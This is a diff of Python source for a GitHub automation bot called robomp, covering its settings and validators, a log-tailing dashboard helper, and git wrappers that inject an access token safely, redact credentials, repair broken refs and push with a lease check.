@field_validator("rate_limit_unlimited_raw", mode="before")
|
||||
@classmethod
|
||||
def _coerce_unlimited(cls, v: object) -> str:
|
||||
if v is None:
|
||||
return ""
|
||||
if isinstance(v, str):
|
||||
return v
|
||||
if isinstance(v, (list, tuple)):
|
||||
return ",".join(str(item) for item in v)
|
||||
return str(v)
|
||||
|
||||
@property
|
||||
def rate_limit_unlimited(self) -> frozenset[str]:
|
||||
items = [piece.strip().lstrip("@").lower() for piece in self.rate_limit_unlimited_raw.split(",")]
|
||||
return frozenset(item for item in items if item)
|
||||
|
||||
@field_validator("maintainer_logins_raw", mode="before")
|
||||
@classmethod
|
||||
def _coerce_maintainers(cls, v: object) -> str:
|
||||
if v is None:
|
||||
return ""
|
||||
if isinstance(v, str):
|
||||
return v
|
||||
if isinstance(v, (list, tuple)):
|
||||
return ",".join(str(item) for item in v)
|
||||
return str(v)
|
||||
|
||||
@field_validator("reviewer_bots_raw", mode="before")
|
||||
@classmethod
|
||||
def _coerce_reviewer_bots(cls, v: object) -> str:
|
||||
if v is None:
|
||||
return ""
|
||||
if isinstance(v, str):
|
||||
return v
|
||||
if isinstance(v, (list, tuple)):
|
||||
return ",".join(str(item) for item in v)
|
||||
return str(v)
|
||||
|
||||
@property
|
||||
def reviewer_bots(self) -> frozenset[str]:
|
||||
items = [piece.strip().lstrip("@").lower() for piece in self.reviewer_bots_raw.split(",")]
|
||||
return frozenset(item for item in items if item)
|
||||
|
||||
@property
|
||||
def maintainer_logins(self) -> frozenset[str]:
|
||||
items = [piece.strip().lstrip("@").lower() for piece in self.maintainer_logins_raw.split(",")]
|
||||
return frozenset(item for item in items if item)
|
||||
|
||||
def allows(self, full_name: str) -> bool:
|
||||
return full_name.lower() in self.repo_allowlist
|
||||
|
||||
@property
|
||||
def model_pool(self) -> tuple[str, ...]:
|
||||
"""ROBOMP_MODEL may be a single id or a comma-separated list; this
|
||||
returns the parsed pool (always non-empty)."""
|
||||
items = [piece.strip() for piece in self.model.split(",") if piece.strip()]
|
||||
return tuple(items) or (self.model,)
|
||||
|
||||
def pick_model(self) -> str:
|
||||
"""Random selection from the pool (uniform). One-element pools return that one."""
|
||||
return random.choice(self.model_pool)
|
||||
|
||||
@property
|
||||
def resolved_author_name(self) -> str:
|
||||
"""Falls back to bot_login if ROBOMP_GIT_AUTHOR_NAME isn't set."""
|
||||
return (self.git_author_name or self.bot_login).strip()
|
||||
|
||||
def ensure_paths(self) -> None:
|
||||
for path in (self.workspace_root, self.sqlite_path.parent, self.log_dir):
|
||||
path.mkdir(parents=True, exist_ok=True)
|
||||
|
||||
|
||||
@cache
|
||||
def get_settings() -> Settings:
|
||||
return Settings() # type: ignore[call-arg]
|
||||
|
||||
|
||||
def reset_settings_cache() -> None:
|
||||
"""Invalidate the cached settings (tests)."""
|
||||
get_settings.cache_clear()
|
||||
|
||||
|
||||
class _ProxyEnvLoader(BaseSettings):
|
||||
"""Minimal env loader for `python -m robomp.proxy serve`.
|
||||
|
||||
Validates only the fields the gh-proxy container actually needs
|
||||
(PAT, HMAC key, bind address, paths). Keeping this separate from the
|
||||
orchestrator-mode `Settings()` ctor avoids dragging in
|
||||
`_validate_proxy_or_pat` and friends, which would reject a perfectly
|
||||
valid proxy deployment (no webhook secret, no bot_login, no proxy URL)
|
||||
before `serve()` can give a specific error.
|
||||
"""
|
||||
|
||||
model_config = SettingsConfigDict(
|
||||
env_file=".env",
|
||||
env_file_encoding="utf-8",
|
||||
extra="ignore",
|
||||
case_sensitive=False,
|
||||
)
|
||||
|
||||
github_token: SecretStr = Field(..., alias="GITHUB_TOKEN")
|
||||
gh_proxy_hmac_key: SecretStr = Field(..., alias="ROBOMP_GH_PROXY_HMAC_KEY")
|
||||
gh_proxy_bind_host: str = Field("0.0.0.0", alias="ROBOMP_GH_PROXY_BIND_HOST")
|
||||
gh_proxy_bind_port: int = Field(8081, alias="ROBOMP_GH_PROXY_BIND_PORT")
|
||||
workspace_root: Path = Field(Path("./data/workspaces"), alias="ROBOMP_WORKSPACE_ROOT")
|
||||
log_dir: Path = Field(Path("./data/logs"), alias="ROBOMP_LOG_DIR")
|
||||
gh_proxy_max_body_bytes: int = Field(1 << 20, alias="ROBOMP_GH_PROXY_MAX_BODY_BYTES")
|
||||
gh_proxy_git_timeout_seconds: float = Field(60.0, alias="ROBOMP_GH_PROXY_GIT_TIMEOUT_SECONDS")
|
||||
|
||||
@field_validator("github_token", "gh_proxy_hmac_key", mode="before")
|
||||
@classmethod
|
||||
def _reject_blank(cls, value: object) -> object:
|
||||
if isinstance(value, str) and not value.strip():
|
||||
raise ValueError("must be a non-empty string")
|
||||
if hasattr(value, "get_secret_value"):
|
||||
inner = value.get_secret_value() # type: ignore[attr-defined]
|
||||
if isinstance(inner, str) and not inner.strip():
|
||||
raise ValueError("must be a non-empty string")
|
||||
return value
|
||||
|
||||
|
||||
def load_proxy_settings() -> Settings:
|
||||
"""Build a `Settings` instance suitable for the gh-proxy process.
|
||||
|
||||
Only the env vars the proxy actually consumes are required; the
|
||||
orchestrator-only fields (webhook secret, bot_login, …) are set to
|
||||
inert placeholders since `proxy.server` never reads them. Skips the
|
||||
`Settings()` cross-field validator (which presumes orchestrator
|
||||
semantics) by routing through `model_construct`.
|
||||
"""
|
||||
loader = _ProxyEnvLoader() # type: ignore[call-arg]
|
||||
return Settings.model_construct(
|
||||
github_token=loader.github_token,
|
||||
github_webhook_secret=SecretStr(""),
|
||||
bot_login="gh-proxy",
|
||||
git_author_email="gh-proxy@invalid",
|
||||
gh_proxy_url=None,
|
||||
gh_proxy_hmac_key=loader.gh_proxy_hmac_key,
|
||||
gh_proxy_bind_host=loader.gh_proxy_bind_host,
|
||||
gh_proxy_bind_port=loader.gh_proxy_bind_port,
|
||||
workspace_root=loader.workspace_root,
|
||||
log_dir=loader.log_dir,
|
||||
gh_proxy_max_body_bytes=loader.gh_proxy_max_body_bytes,
|
||||
gh_proxy_git_timeout_seconds=loader.gh_proxy_git_timeout_seconds,
|
||||
)
|
||||
@@ -0,0 +1,139 @@
|
||||
"""Status dashboard helpers: log tail + the static SPA served at `/`.
|
||||
|
||||
The HTML/JS/CSS live under `src/robomp/static/`, produced by the Vite build in
|
||||
`web/`. This module just locates the bundle, substitutes the per-instance
|
||||
config sentinel, and exposes a small API to the FastAPI app.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
from functools import cache
|
||||
from pathlib import Path
|
||||
from typing import Any
|
||||
|
||||
# Tail at most this many bytes from the end of the log file. Caps work for any
|
||||
# `limit`, even pathologically large ones, on a multi-MB rotating file.
|
||||
_TAIL_MAX_BYTES = 2 * 1024 * 1024
|
||||
|
||||
# Sentinel literally embedded in the built `index.html`; replaced per-request
|
||||
# with a JSON config blob so the SPA can pick up the replay token.
|
||||
_CONFIG_SENTINEL = "__ROBOMP_CONFIG__"
|
||||
|
||||
_STATIC_DIR = Path(__file__).resolve().parent / "static"
|
||||
_INDEX_PATH = _STATIC_DIR / "index.html"
|
||||
|
||||
|
||||
def tail_jsonl(path: Path, *, limit: int) -> list[dict[str, Any]]:
|
||||
"""Return up to `limit` JSON log records from the tail of `path` (oldest first).
|
||||
|
||||
Lines that fail to parse are returned as `{"level": "RAW", "msg": <line>}`
|
||||
so a malformed final line never blanks the whole view.
|
||||
"""
|
||||
if limit <= 0 or not path.exists():
|
||||
return []
|
||||
|
||||
try:
|
||||
size = path.stat().st_size
|
||||
except OSError:
|
||||
return []
|
||||
if size == 0:
|
||||
return []
|
||||
|
||||
read_size = min(size, _TAIL_MAX_BYTES)
|
||||
with path.open("rb") as fh:
|
||||
fh.seek(size - read_size)
|
||||
chunk = fh.read(read_size)
|
||||
|
||||
# If we started mid-line, drop the partial leading line.
|
||||
if read_size < size:
|
||||
nl = chunk.find(b"\n")
|
||||
if nl == -1:
|
||||
return []
|
||||
chunk = chunk[nl + 1 :]
|
||||
|
||||
lines = chunk.splitlines()
|
||||
out: list[dict[str, Any]] = []
|
||||
for raw in lines[-limit:]:
|
||||
line = raw.strip()
|
||||
if not line:
|
||||
continue
|
||||
try:
|
||||
obj = json.loads(line)
|
||||
if isinstance(obj, dict):
|
||||
out.append(obj)
|
||||
continue
|
||||
except json.JSONDecodeError:
|
||||
pass
|
||||
out.append({"level": "RAW", "logger": "raw", "msg": line.decode("utf-8", errors="replace")})
|
||||
return out
|
||||
|
||||
|
||||
class DashboardBundleMissing(RuntimeError):
|
||||
"""Raised when the built frontend bundle is unavailable.
|
||||
|
||||
The dev workflow is `bun run web:build` (one-shot Bun + Vite build); the
|
||||
Docker image bakes the bundle in via the `web-builder` stage. Tests use a
|
||||
placeholder `index.html` written into the static dir by `conftest.py`,
|
||||
so this never fires in CI.
|
||||
"""
|
||||
|
||||
|
||||
def static_dir() -> Path:
|
||||
"""Filesystem path the FastAPI app mounts at `/static`.
|
||||
|
||||
Creates the directory lazily so a fresh checkout (or a runtime container
|
||||
that hasn't shipped the bundle yet) can still construct the app —
|
||||
`_load_index_template()` raises `DashboardBundleMissing` separately when
|
||||
the `index.html` itself is missing. Without this mkdir,
|
||||
`StaticFiles(directory=...)` would raise at app construction time and
|
||||
block every other route.
|
||||
"""
|
||||
_STATIC_DIR.mkdir(parents=True, exist_ok=True)
|
||||
return _STATIC_DIR
|
||||
|
||||
|
||||
@cache
|
||||
def _load_index_template() -> str:
|
||||
try:
|
||||
text = _INDEX_PATH.read_text(encoding="utf-8")
|
||||
except FileNotFoundError as exc: # pragma: no cover — repo ships the stub
|
||||
raise DashboardBundleMissing(f"frontend bundle missing at {_INDEX_PATH}; run `bun run web:build`") from exc
|
||||
if _CONFIG_SENTINEL not in text:
|
||||
raise DashboardBundleMissing(
|
||||
f"frontend bundle at {_INDEX_PATH} is missing the {_CONFIG_SENTINEL} sentinel; "
|
||||
"rebuild with `bun run web:build`"
|
||||
)
|
||||
return text
|
||||
|
||||
|
||||
def reset_index_cache() -> None:
|
||||
"""Drop the cached template. Called by tests that swap the static dir."""
|
||||
_load_index_template.cache_clear()
|
||||
|
||||
|
||||
def render_index(replay_token: str | None) -> str:
|
||||
"""Render the dashboard HTML with the server's replay token baked in.
|
||||
|
||||
The token lands inside a `<script type="application/json">` block that the
|
||||
page parses at startup and attaches to every privileged fetch. The user
|
||||
never sees or types it; the only credential to manage is the env var on
|
||||
the server itself.
|
||||
"""
|
||||
config = {
|
||||
"replayEnabled": bool(replay_token),
|
||||
"replayToken": replay_token or "",
|
||||
}
|
||||
# `</` would otherwise let an attacker-controlled token break out of the
|
||||
# script element; escape it the standard way.
|
||||
payload = json.dumps(config, separators=(",", ":")).replace("</", "<\\/")
|
||||
return _load_index_template().replace(_CONFIG_SENTINEL, payload)
|
||||
|
||||
|
||||
__all__ = [
|
||||
"DashboardBundleMissing",
|
||||
"render_index",
|
||||
"reset_index_cache",
|
||||
"static_dir",
|
||||
"tail_jsonl",
|
||||
]
|
||||
File diff suppressed because it is too large
Load Diff
@@ -0,0 +1,568 @@
|
||||
"""Low-level git primitives with ephemeral PAT injection.
|
||||
|
||||
The PAT is supplied through `git --config-env=http.extraHeader=ENVVAR`. Git
|
||||
expands the env var inside the spawned process; the secret only appears in
|
||||
the spawned process's environment, never in argv visible to other UIDs via
|
||||
`/proc/<pid>/cmdline`. The env var is wiped from the parent after each call.
|
||||
|
||||
Used by:
|
||||
- `robomp.sandbox.LocalGitTransport` for in-process git operations when no
|
||||
proxy is configured.
|
||||
- `robomp.proxy.server` for proxied operations on the gh-proxy side.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import base64
|
||||
import logging
|
||||
import os
|
||||
import platform
|
||||
import re
|
||||
import subprocess
|
||||
from collections.abc import Mapping
|
||||
from dataclasses import dataclass
|
||||
from pathlib import Path
|
||||
from typing import Any
|
||||
from urllib.parse import urlparse
|
||||
|
||||
log = logging.getLogger(__name__)
|
||||
|
||||
# Per-call env var name. `git --config-env` reads the header value from this
|
||||
# env entry inside the spawned process — never persisted into `.git/config`.
|
||||
AUTH_ENV_VAR = "ROBOMP_GIT_HTTP_AUTH"
|
||||
|
||||
_CRED_URL = re.compile(r"(https?://)([^:/@\s]+):([^@/\s]+)@")
|
||||
_BAD_OBJECT_REF_RE = re.compile(
|
||||
r"(?:fatal: bad object (?P<bad>refs/[^\s]+)|error: (?P<invalid>refs/[^\s]+) does not point to a valid object!)"
|
||||
)
|
||||
_FETCH_PRUNE_REPAIR_ATTEMPTS = 8
|
||||
|
||||
_SHARED_OMP_GID = 2000
|
||||
_AGENT_HOME = Path("/srv/agent-home")
|
||||
|
||||
|
||||
def _slot_permissions_active(slot_uid: int | None) -> bool:
|
||||
return slot_uid is not None and platform.system() == "Linux" and os.geteuid() == 0
|
||||
|
||||
|
||||
def _slot_subprocess_kwargs(slot_uid: int | None) -> dict[str, Any]:
|
||||
if not _slot_permissions_active(slot_uid):
|
||||
return {}
|
||||
assert slot_uid is not None
|
||||
return {"user": slot_uid, "group": slot_uid, "extra_groups": [_SHARED_OMP_GID], "umask": 0o002}
|
||||
|
||||
|
||||
def _append_safe_directory(env: dict[str, str], repo_dir: Path) -> None:
|
||||
count = int(env.get("GIT_CONFIG_COUNT", "0"))
|
||||
env[f"GIT_CONFIG_KEY_{count}"] = "safe.directory"
|
||||
env[f"GIT_CONFIG_VALUE_{count}"] = str(repo_dir)
|
||||
env["GIT_CONFIG_COUNT"] = str(count + 1)
|
||||
|
||||
|
||||
def _local_remote_safe_directory(remote_url: str, *, cwd: Path) -> Path | None:
|
||||
"""Return a local filesystem remote path that git may need whitelisted."""
|
||||
raw = remote_url.strip()
|
||||
if not raw:
|
||||
return None
|
||||
if raw.startswith("file://"):
|
||||
parsed = urlparse(raw)
|
||||
if parsed.netloc not in ("", "localhost"):
|
||||
return None
|
||||
return Path(parsed.path)
|
||||
if "://" in raw or re.match(r"^[^/\\s]+:", raw):
|
||||
return None
|
||||
path = Path(raw)
|
||||
return path if path.is_absolute() else (cwd / path).resolve()
|
||||
|
||||
|
||||
def redact_credentials(text: str | None) -> str:
|
||||
"""Strip `user:password@` from any embedded URL in `text`."""
|
||||
if not text:
|
||||
return text or ""
|
||||
return _CRED_URL.sub(r"\1***@", text)
|
||||
|
||||
|
||||
def _redacted_cmd(cmd: list[str]) -> list[str]:
|
||||
return [redact_credentials(part) for part in cmd]
|
||||
|
||||
|
||||
class GitCommandError(RuntimeError):
|
||||
"""Wraps a failed git subprocess with credentials redacted from argv and stderr."""
|
||||
|
||||
def __init__(self, cmd: list[str], returncode: int, stdout: str, stderr: str) -> None:
|
||||
self.returncode = returncode
|
||||
self.stdout = redact_credentials(stdout)
|
||||
self.stderr = redact_credentials(stderr)
|
||||
self.cmd = _redacted_cmd(cmd)
|
||||
msg = self.stderr.strip() or self.stdout.strip() or f"exit {returncode}"
|
||||
super().__init__(f"git {' '.join(self.cmd[1:])} failed: {msg}")
|
||||
|
||||
|
||||
def _basic_auth_header(token: str) -> str:
|
||||
"""Build the `Authorization: Basic …` header value for a PAT.
|
||||
|
||||
GitHub accepts `x-access-token:<PAT>` over HTTPS Basic auth; that form
|
||||
works for fine-grained tokens, classic PATs, and GitHub App installation
|
||||
tokens alike.
|
||||
"""
|
||||
raw = f"x-access-token:{token}".encode()
|
||||
return f"Authorization: Basic {base64.b64encode(raw).decode('ascii')}"
|
||||
|
||||
|
||||
_DEFAULT_GIT_TIMEOUT_SECONDS = 120.0
|
||||
"""Hard wall-clock cap on any one `git` invocation. Overridable per-call.
|
||||
|
||||
A hung child (auth prompt, network stall, server-side packfile generation
|
||||
that never finishes) MUST NOT pin the calling thread forever — especially
|
||||
when the gh-proxy invokes `_run_git` from an executor and bounds its OWN
|
||||
wait via `asyncio.wait_for`. The asyncio bound returns control to the
|
||||
event loop, but only this `timeout=` + kill below frees the OS process.
|
||||
"""
|
||||
|
||||
|
||||
def _run_git(
|
||||
args: list[str],
|
||||
*,
|
||||
cwd: Path | None,
|
||||
token: str | None,
|
||||
extra_env: Mapping[str, str] | None = None,
|
||||
safe_directory: Path | None = None,
|
||||
user: int | None = None,
|
||||
group: int | None = None,
|
||||
extra_groups: list[int] | tuple[int, ...] | None = None,
|
||||
umask: int | None = None,
|
||||
timeout: float | None = None,
|
||||
) -> subprocess.CompletedProcess[str]:
|
||||
"""Run `git <args>` with optional PAT injection via `--config-env`.
|
||||
|
||||
A returncode of 0 returns the populated `CompletedProcess`. Non-zero exit
|
||||
returns the same shape; callers either `_check` it or inspect manually
|
||||
(e.g. when probing for ref existence). Stdout/stderr are always
|
||||
credential-redacted before being returned.
|
||||
|
||||
On `timeout` expiry the child (and any descendants spawned by git's
|
||||
helpers) is killed and `GitCommandError` is raised with a synthetic
|
||||
returncode (124, matching coreutils `timeout`). `None` uses
|
||||
`_DEFAULT_GIT_TIMEOUT_SECONDS`.
|
||||
"""
|
||||
env: dict[str, str] = {**os.environ, "GIT_TERMINAL_PROMPT": "0"}
|
||||
if user is not None and _AGENT_HOME.is_dir():
|
||||
env["HOME"] = str(_AGENT_HOME)
|
||||
if extra_env:
|
||||
env.update(extra_env)
|
||||
if safe_directory is not None:
|
||||
_append_safe_directory(env, safe_directory)
|
||||
|
||||
cmd: list[str] = ["git"]
|
||||
if token:
|
||||
env[AUTH_ENV_VAR] = _basic_auth_header(token)
|
||||
cmd.extend(["--config-env", f"http.extraHeader={AUTH_ENV_VAR}"])
|
||||
cmd.extend(args)
|
||||
log.debug("git", extra={"cmd": _redacted_cmd(cmd), "cwd": str(cwd) if cwd else None})
|
||||
effective_timeout = _DEFAULT_GIT_TIMEOUT_SECONDS if timeout is None else timeout
|
||||
subprocess_kwargs: dict[str, Any] = {}
|
||||
if user is not None:
|
||||
subprocess_kwargs["user"] = user
|
||||
if group is not None:
|
||||
subprocess_kwargs["group"] = group
|
||||
if extra_groups is not None:
|
||||
subprocess_kwargs["extra_groups"] = extra_groups
|
||||
if umask is not None:
|
||||
subprocess_kwargs["umask"] = umask
|
||||
try:
|
||||
proc = subprocess.run(
|
||||
cmd,
|
||||
cwd=str(cwd) if cwd else None,
|
||||
env=env,
|
||||
check=False,
|
||||
capture_output=True,
|
||||
text=True,
|
||||
timeout=effective_timeout,
|
||||
**subprocess_kwargs,
|
||||
)
|
||||
except subprocess.TimeoutExpired as exc:
|
||||
# `subprocess.run` already kills the direct child when the timeout
|
||||
# fires, but we explicitly re-raise as `GitCommandError` so callers
|
||||
# don't have to special-case `TimeoutExpired` alongside the regular
|
||||
# non-zero-exit error path. 124 mirrors GNU `timeout`.
|
||||
stdout = redact_credentials(exc.stdout or "") if isinstance(exc.stdout, str) else ""
|
||||
stderr_msg = f"git timed out after {effective_timeout:.0f}s: {' '.join(_redacted_cmd(cmd))}"
|
||||
raise GitCommandError(cmd, 124, stdout, stderr_msg) from exc
|
||||
if proc.stdout:
|
||||
proc.stdout = redact_credentials(proc.stdout)
|
||||
if proc.stderr:
|
||||
proc.stderr = redact_credentials(proc.stderr)
|
||||
return proc
|
||||
|
||||
|
||||
def _check(proc: subprocess.CompletedProcess[str], cmd: list[str]) -> subprocess.CompletedProcess[str]:
|
||||
if proc.returncode != 0:
|
||||
raise GitCommandError(cmd, proc.returncode, proc.stdout, proc.stderr)
|
||||
return proc
|
||||
|
||||
|
||||
def _git_dir(repo_dir: Path) -> Path | None:
|
||||
dot_git = repo_dir / ".git"
|
||||
if dot_git.is_dir():
|
||||
return dot_git
|
||||
if dot_git.is_file():
|
||||
try:
|
||||
text = dot_git.read_text(encoding="utf-8").strip()
|
||||
except OSError:
|
||||
return None
|
||||
prefix = "gitdir:"
|
||||
if not text.startswith(prefix):
|
||||
return None
|
||||
git_dir = Path(text[len(prefix) :].strip())
|
||||
return git_dir if git_dir.is_absolute() else (repo_dir / git_dir).resolve()
|
||||
if (repo_dir / "HEAD").exists() and (repo_dir / "objects").is_dir():
|
||||
return repo_dir
|
||||
return None
|
||||
|
||||
|
||||
def _resolve_alternate_path(objects_dir: Path, raw: str) -> Path:
|
||||
path = Path(raw)
|
||||
if path.is_absolute():
|
||||
return path
|
||||
return (objects_dir / path).resolve()
|
||||
|
||||
|
||||
def _prune_missing_alternates(repo_dir: Path) -> bool:
|
||||
"""Drop object alternates that point at directories no longer mounted.
|
||||
|
||||
The bot never configures alternates for pool clones. If one leaks in from
|
||||
an external git invocation and points at a temp directory, every later
|
||||
fetch emits warnings and refs whose objects lived only there become
|
||||
unreadable. Removing the dead alternate lets the repair path below delete
|
||||
those broken refs and recover the pool without recloning it.
|
||||
"""
|
||||
git_dir = _git_dir(repo_dir)
|
||||
if git_dir is None:
|
||||
return False
|
||||
objects_dir = git_dir / "objects"
|
||||
alternates = objects_dir / "info" / "alternates"
|
||||
try:
|
||||
lines = alternates.read_text(encoding="utf-8").splitlines()
|
||||
except (OSError, UnicodeDecodeError):
|
||||
return False
|
||||
|
||||
kept: list[str] = []
|
||||
changed = False
|
||||
for line in lines:
|
||||
raw = line.strip()
|
||||
if not raw:
|
||||
changed = True
|
||||
continue
|
||||
if _resolve_alternate_path(objects_dir, raw).is_dir():
|
||||
kept.append(line)
|
||||
else:
|
||||
changed = True
|
||||
|
||||
if not changed:
|
||||
return False
|
||||
try:
|
||||
if kept:
|
||||
alternates.write_text("\n".join(kept) + "\n", encoding="utf-8")
|
||||
else:
|
||||
alternates.unlink()
|
||||
except OSError as exc:
|
||||
log.warning("failed to prune missing git alternates", extra={"repo_dir": str(repo_dir), "error": str(exc)})
|
||||
return False
|
||||
log.warning("pruned missing git alternates", extra={"repo_dir": str(repo_dir)})
|
||||
return True
|
||||
|
||||
|
||||
def _is_safe_ref_name(ref: str) -> bool:
|
||||
if not ref.startswith("refs/"):
|
||||
return False
|
||||
if any(ch in ref for ch in "\0\r\n\t "):
|
||||
return False
|
||||
return all(part not in ("", ".", "..") for part in ref.split("/"))
|
||||
|
||||
|
||||
def _bad_refs_from_fetch_output(output: str) -> tuple[str, ...]:
|
||||
refs: list[str] = []
|
||||
seen: set[str] = set()
|
||||
for match in _BAD_OBJECT_REF_RE.finditer(output):
|
||||
ref = match.group("bad") or match.group("invalid") or ""
|
||||
if ref in seen or not _is_safe_ref_name(ref):
|
||||
continue
|
||||
seen.add(ref)
|
||||
refs.append(ref)
|
||||
return tuple(refs)
|
||||
|
||||
|
||||
def _worktrees_holding_refs(repo_dir: Path, refs: tuple[str, ...]) -> dict[str, list[str]]:
|
||||
"""Map each ref in ``refs`` to the worktree paths whose ``HEAD`` is on it.
|
||||
|
||||
A worktree that has the soon-to-be-deleted branch checked out keeps a
|
||||
stale ``HEAD`` pointer after ``update-ref -d`` succeeds in the shared
|
||||
refs store. The next ``git fetch`` then re-reports the same "bad object"
|
||||
error because git inspects every worktree's ``HEAD`` for connectivity.
|
||||
Removing the offending worktree (or running ``git worktree remove
|
||||
--force`` on it) clears that pointer so the fetch can recover.
|
||||
"""
|
||||
if not refs:
|
||||
return {}
|
||||
proc = _run_git(["worktree", "list", "--porcelain"], cwd=repo_dir, token=None)
|
||||
if proc.returncode != 0:
|
||||
return {}
|
||||
refs_set = set(refs)
|
||||
by_ref: dict[str, list[str]] = {}
|
||||
current: dict[str, str] = {}
|
||||
|
||||
def _flush() -> None:
|
||||
branch = current.get("branch")
|
||||
path = current.get("worktree")
|
||||
if branch in refs_set and path:
|
||||
by_ref.setdefault(branch, []).append(path)
|
||||
|
||||
for line in proc.stdout.splitlines():
|
||||
if not line.strip():
|
||||
_flush()
|
||||
current.clear()
|
||||
continue
|
||||
key, _, val = line.partition(" ")
|
||||
if key and val:
|
||||
current[key] = val
|
||||
_flush()
|
||||
return by_ref
|
||||
|
||||
|
||||
def _remove_worktrees(repo_dir: Path, paths: list[str]) -> None:
|
||||
for path in paths:
|
||||
proc = _run_git(["worktree", "remove", "--force", path], cwd=repo_dir, token=None)
|
||||
if proc.returncode != 0:
|
||||
log.warning(
|
||||
"failed to remove worktree during fetch repair",
|
||||
extra={"repo_dir": str(repo_dir), "worktree": path, "stderr": proc.stderr[:500]},
|
||||
)
|
||||
continue
|
||||
log.warning(
|
||||
"removed worktree during fetch repair",
|
||||
extra={"repo_dir": str(repo_dir), "worktree": path},
|
||||
)
|
||||
if paths:
|
||||
_run_git(["worktree", "prune"], cwd=repo_dir, token=None)
|
||||
|
||||
|
||||
def _delete_bad_refs(repo_dir: Path, output: str) -> bool:
|
||||
bad_refs = _bad_refs_from_fetch_output(output)
|
||||
if not bad_refs:
|
||||
return False
|
||||
holding = _worktrees_holding_refs(repo_dir, bad_refs)
|
||||
changed = False
|
||||
for ref in bad_refs:
|
||||
worktrees = holding.get(ref) or []
|
||||
if worktrees:
|
||||
_remove_worktrees(repo_dir, worktrees)
|
||||
changed = True
|
||||
proc = _run_git(["update-ref", "-d", ref], cwd=repo_dir, token=None)
|
||||
if proc.returncode == 0:
|
||||
changed = True
|
||||
log.warning(
|
||||
"deleted invalid git ref during fetch repair",
|
||||
extra={"repo_dir": str(repo_dir), "git_ref": ref},
|
||||
)
|
||||
continue
|
||||
log.warning(
|
||||
"failed to delete invalid git ref during fetch repair",
|
||||
extra={"repo_dir": str(repo_dir), "git_ref": ref, "stderr": proc.stderr[:500]},
|
||||
)
|
||||
return changed
|
||||
|
||||
|
||||
def _repair_fetch_prune_failure(repo_dir: Path, output: str) -> bool:
|
||||
pruned_alternates = _prune_missing_alternates(repo_dir)
|
||||
deleted_refs = _delete_bad_refs(repo_dir, output)
|
||||
return pruned_alternates or deleted_refs
|
||||
|
||||
|
||||
# ---------- Public primitives ----------
|
||||
|
||||
|
||||
def clone(
|
||||
target: Path,
|
||||
*,
|
||||
clone_url: str,
|
||||
default_branch: str,
|
||||
token: str | None,
|
||||
safe_directory: Path | None = None,
|
||||
) -> None:
|
||||
"""Fresh `git clone --filter=blob:none` into `target`."""
|
||||
target.parent.mkdir(parents=True, exist_ok=True)
|
||||
args = [
|
||||
"clone",
|
||||
"--filter=blob:none",
|
||||
"--no-tags",
|
||||
"--branch",
|
||||
default_branch,
|
||||
clone_url,
|
||||
str(target),
|
||||
]
|
||||
_check(_run_git(args, cwd=None, token=token, safe_directory=safe_directory), ["git", *args])
|
||||
|
||||
|
||||
def fetch_prune(repo_dir: Path, *, token: str | None, safe_directory: Path | None = None) -> None:
|
||||
"""`git fetch --prune origin` on the shared pool clone.
|
||||
|
||||
Pool clones are long-lived. If a transient git object alternate leaks into
|
||||
the pool and later disappears, `git fetch` can fail before it has a chance
|
||||
to refresh from origin because a local ref points at an object that only
|
||||
existed in that missing alternate. Repair that exact corruption in-place:
|
||||
drop dead alternates, delete refs Git already reported as invalid, then
|
||||
retry the fetch.
|
||||
"""
|
||||
args = ["fetch", "--prune", "origin"]
|
||||
_prune_missing_alternates(repo_dir)
|
||||
last_proc: subprocess.CompletedProcess[str] | None = None
|
||||
for _ in range(_FETCH_PRUNE_REPAIR_ATTEMPTS):
|
||||
proc = _run_git(args, cwd=repo_dir, token=token, safe_directory=safe_directory)
|
||||
if proc.returncode == 0:
|
||||
return
|
||||
last_proc = proc
|
||||
output = f"{proc.stderr}\n{proc.stdout}"
|
||||
if not _repair_fetch_prune_failure(repo_dir, output):
|
||||
_check(proc, ["git", *args])
|
||||
assert last_proc is not None
|
||||
_check(last_proc, ["git", *args])
|
||||
|
||||
|
||||
def fetch_ref(repo_dir: Path, ref: str, *, token: str | None, safe_directory: Path | None = None) -> None:
|
||||
"""`git fetch origin <ref>` (best-effort: caller decides to swallow)."""
|
||||
args = ["fetch", "origin", ref]
|
||||
proc = _run_git(args, cwd=repo_dir, token=token, safe_directory=safe_directory)
|
||||
if proc.returncode != 0:
|
||||
log.debug(
|
||||
"fetch_ref non-fatal failure",
|
||||
extra={"ref": ref, "stderr": proc.stderr},
|
||||
)
|
||||
|
||||
|
||||
@dataclass(slots=True, frozen=True)
|
||||
class PushResult:
|
||||
head: str
|
||||
branch: str
|
||||
|
||||
|
||||
class HeadDriftError(GitCommandError):
|
||||
"""Raised when `expected_head` no longer matches the current HEAD.
|
||||
|
||||
Defends against an attacker landing a commit between the orchestrator's
|
||||
preflight gates and the actual push.
|
||||
"""
|
||||
|
||||
|
||||
def rev_parse_head(
|
||||
repo_dir: Path,
|
||||
*,
|
||||
safe_directory: Path | None = None,
|
||||
user: int | None = None,
|
||||
group: int | None = None,
|
||||
extra_groups: list[int] | tuple[int, ...] | None = None,
|
||||
umask: int | None = None,
|
||||
) -> str:
|
||||
"""Return the SHA of HEAD or raise GitCommandError."""
|
||||
args = ["rev-parse", "HEAD"]
|
||||
proc = _run_git(
|
||||
args,
|
||||
cwd=repo_dir,
|
||||
token=None,
|
||||
safe_directory=safe_directory,
|
||||
user=user,
|
||||
group=group,
|
||||
extra_groups=extra_groups,
|
||||
umask=umask,
|
||||
)
|
||||
if proc.returncode != 0:
|
||||
raise GitCommandError(["git", *args], proc.returncode, proc.stdout, proc.stderr)
|
||||
return proc.stdout.strip()
|
||||
|
||||
|
||||
def push(
|
||||
repo_dir: Path,
|
||||
*,
|
||||
branch: str,
|
||||
expected_head: str | None,
|
||||
token: str | None,
|
||||
slot_uid: int | None = None,
|
||||
safe_directory: Path | None = None,
|
||||
) -> PushResult:
|
||||
"""`git push --force-with-lease=<ref>:<sha> --set-upstream origin <branch>` from `repo_dir`.
|
||||
|
||||
The lease is pinned to whatever SHA the local `refs/remotes/origin/<branch>`
|
||||
currently records — i.e. what the workspace last fetched. The push only
|
||||
succeeds if origin's `<branch>` still matches that SHA, so a parallel
|
||||
writer to the same ref (between our last fetch and this push) is detected
|
||||
and refused even when the push is a fast-forward of HEAD. For a brand-new
|
||||
branch the local remote-tracking ref is absent, so the lease expects "no
|
||||
ref on origin" (empty expected value).
|
||||
|
||||
